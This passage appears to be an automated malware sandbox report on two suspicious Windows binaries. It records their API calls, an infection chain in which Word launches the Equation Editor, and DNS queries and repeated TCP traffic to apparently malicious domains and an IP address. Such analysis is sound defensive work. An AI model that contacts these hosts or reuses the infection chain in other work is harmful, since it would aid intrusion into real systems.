Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Code function: 21_2_0040AE51 FindFirstFileW,FindNextFileW,21_2_0040AE51
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Code function: 22_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,22_2_00407EF8
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Code function: 23_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,23_2_00407898
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,25_2_00409253
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,25_2_0041C291
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,25_2_0040C34D
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,25_2_00409665
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_0044E879 FindFirstFileExA,25_2_0044E879
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,25_2_0040880C
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_0040783C FindFirstFileW,FindNextFileW,25_2_0040783C
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,25_2_00419AF5
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,25_2_0040BB30
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,25_2_0040BD37
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,25_2_00407C97
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | File opened: C:\Windows\SysWOW64\config\systemprofile\
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Code function: 4x nop then jmp 00D73B2Dh 5_2_00D7316E
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Code function: 4x nop then jmp 00D73B2Dh 5_2_00D73789
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Code function: 4x nop then jmp 00D73B2Dh 5_2_00D731BA
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Code function: 4x nop then jmp 00D73B2Dh 5_2_00D73500
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Code function: 4x nop then jmp 00D73B2Dh 5_2_00D73283
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Code function: 4x nop then jmp 00D73B2Dh 5_2_00D732AE
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Code function: 4x nop then jmp 00D73B2Dh 5_2_00D73263
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 4x nop then jmp 046A340Dh 15_2_046A3069
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 4x nop then jmp 046A340Dh 15_2_046A2A4E
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 4x nop then jmp 046A340Dh 15_2_046A2DE0
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 4x nop then jmp 046A340Dh 15_2_046A2A9A
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 4x nop then jmp 046A340Dh 15_2_046A2B5E
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 4x nop then jmp 046A340Dh 15_2_046A2B8E
Source: global traffic | DNS query: name: sinopecllc.top
Source: global traffic | DNS query: name: antfly50.sytes.net
Source: global traffic | DNS query: name: geoplugin.net
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 178.237.33.50:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 31.192.235.145:80
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 31.192.235.145:80 -> 192.168.2.22:49164
